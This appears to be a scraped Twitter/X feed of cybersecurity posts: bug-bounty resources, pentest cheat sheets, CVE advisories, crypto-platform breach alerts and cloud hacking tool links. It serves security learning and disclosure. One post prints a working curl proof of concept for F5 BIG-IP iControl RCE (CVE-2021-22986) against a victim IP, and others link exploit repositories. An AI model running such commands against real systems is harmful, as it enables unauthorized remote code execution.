Security Study Plan
Complete Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on...
github.com/jassics/securi
#cybersecurity #infosec #pentesting
t.me/hackgit/8490
Anil bhatt’s Tweets
Curating all the write-ups on bug-bounties in one place
some help would be nice :)
if you come across any write-up or write one yourself after getting a bounty,pls add here
13
42
182
Show this thread
The best way to become a Alpha Smart Contract Auditor is to read and understand past exploits/findings 🔐
This is a super large list of companies and their reports 🗒
Remember read, read and read again 🕵♂️
3
16
65
2
33
107
Show this thread
I hacked into a CMS that allowed me to alter search results and take over millions of accounts.
How did I do it? Well, it all started with a simple click in … 👀
This is the story of #BingBang 🧵⬇️
274
4,221
16.2K
Show this thread
☃️Mobile Application Penetration Testing Cheat Sheet☃️
Find Cheatsheets on both
➡️Android App Pentesting
➡️iOS App Pentesting
#bugbounty #cybersecurity #infosec
6
88
209
Show this thread
Experimenting with GPT-3 for Detecting Security Vulnerabilities in Code
12
29
Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allow… t.me/hackgit/7653
3
8
GitHub - horizon3ai/CVE-2022-39952: POC for CVE-2022-39952 -
2
6
12
Show this thread
1
60
158
Researchers Warn of Critical Security Bugs in Schneider Electric Modicon PLCs thehackernews.com/2023/02/resear via
1
5
eJPT: lnkd.in/epAG2R39
eCPPT: lnkd.in/dRCVbvMT
eMAPT: lnkd.in/dpdEV_UY
eWPT: lnkd.in/d5g4w22n
eWPTX: lnkd.in/dhEvuNuW
eCXD: lnkd.in/dwN_q6y4
eCPTXv2: lnkd.in/dEiVaZBG
#Hacking #Infosec #Bugbounty #cyber #security #tech #dfir #AI
18
134
349
Awesome Two Part Series by on a vulnerability chain from unauthenticated user to full RCE in Intel’s Data Center Manager
Auth Bypass (CVE-2022-33942): rcesecurity.com/2022/11/from-z
SQLi to RCE (CVE-2022-21225): rcesecurity.com/2022/12/from-z
#infosec #hacking #bugbounty
2
45
107
Two more days before our Black Friday specials!
And we just reached 90K followers! Let's celebrate!
We are going to give a 1-month voucher to 90 people who RT this tweet and follow (picked randomly)!
106
1,050
821
Show this thread
📑 Root cause analysis from past DeFi incidents.
Hope this stuff can help devs to avoid the same mistakes as much as possible.
Now covered 95 incidents.
wooded-meter-1d8.notion.site/0e85e02c5ed34d
#DeFi #Web3
112
454
1,147
Show this thread
Introducing a smart way to list and filter CVEs
Filter by epss, priority, zeroday, exploit and more
Available at: vi.strobes.co/cves/list/?que
5
131
342
🚨 New advisory was just published! 🚨
A vulnerability in pfSense allows authenticated users to cause the product to execute arbitrary code - this in turn would allow an attacker to compromise the machine on which the pfSense is installed:
ssd-disclosure.com/ssd-advisory-p
GIF
5
71
162
Thread about hunting on the main application 🧵
1. Check the login process
- Do they allow signup with email or Google etc
- Do they allow you to signup with the email
- what is the content-type of the signup/login page
- when you enter valid cred, on which page you
1
467
1,108
Show this thread
1
7
88
959
1,409
🚨BREAKING: Bored Ape Yacht Club and Otherside Metaverse Discord servers have been hacked. Millions worth of #NFTs reportedly stolen.
3,405
12.4K
31.7K
Show this thread
Exploit para CVE-2022-26134 (Atlassian Confluence Unauthenticated RCE) 🔥
Basado en la POC de @Naqwada_: github.com/Nwqda/CVE-2022
Al menos 2.196 servidores aún son vulnerables. Además, si tuviste un servidor de estos expuesto a Internet, asume el compromiso y revisa ASAP 🚨
13
30
. discovers zero-day exploit impacting all current versions of Atlassian Confluence Server and Data Center. Attackers deploy in-memory Java implant to evade detection. Read more in our latest blog post: volexity.com/blog/2022/06/0 #DFIR #ThreatIntel #InfoSec
15
424
657
🚨 CRITICAL ALERT
A severe 0-day vulnerability called #Follina has been exposed (since May 27th) in MS Word Documents.
It could allow hackers to take full control of your computer, in some cases WITHOUT even opening the file. 🧵
211
3,847
6,917
Show this thread
3
32
84
1/
Update:
Initially we thought the issue may have been with AWS, however after further diagnosis, we have identified that the hacker has managed to exploit Godaddy, essentially they have hijacked our domain and copied our codebase and in the process changed the swap parameters
41
205
338
Show this thread
⚠️DO NOT SWAP⚠️
Similar to other protocols hosted on , QuickSwap has been domain hijacked
Funds in LPs, the Dragon's Lair, Syrup Pools, & YOUR wallets are safe
Only swaps have been affected. Please DO NOT SWAP
We are working to resolve the problem & will update ASAP
262
1,846
1,998
Security Alert: If you are on the CoinGecko website and you are being prompted by your Metamask to connect to this site, this is a SCAM. Don't connect it. We are investigating the root cause of this issue.
175
1,587
1,878
F5 BIG-IP iControl RCE (CVE-2021-22986)
execute arbitrary system commands
create or delete files
disable services
PoC #1
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
attackerkb.com/topics/J6pWeg5
11
414
781
Show this thread
Don't waste $13k on courses and bootcamps. 💰
Top 10 Youtube channels to learn Web3 for FREE.
A Thread 🧵
77
884
2,640
Show this thread
🚨Cloud Hacking Tools🚨
AWS - github.com/RhinoSecurityL
GCP - github.com/RhinoSecurityL
Azure - github.com/Azure/Stormspo
Multi Cloud - github.com/nccgroup/Scout
Multi Cloud - github.com/aquasecurity/c
#bugbountytips #bugbounty #redteam #Pentesting #PenTest #infosec #aws #gcp #Azure
13
418
917
Show this thread
I couldn't attend #NahamCon2022, yesterday, now watching the recording on Twitch. For easy session selection I've added the direct links with time codes in the thread below (requires subscription to 's Twitch channel, but it's absolutely worth it!) 👇🧵
3
27
77
Show this thread





































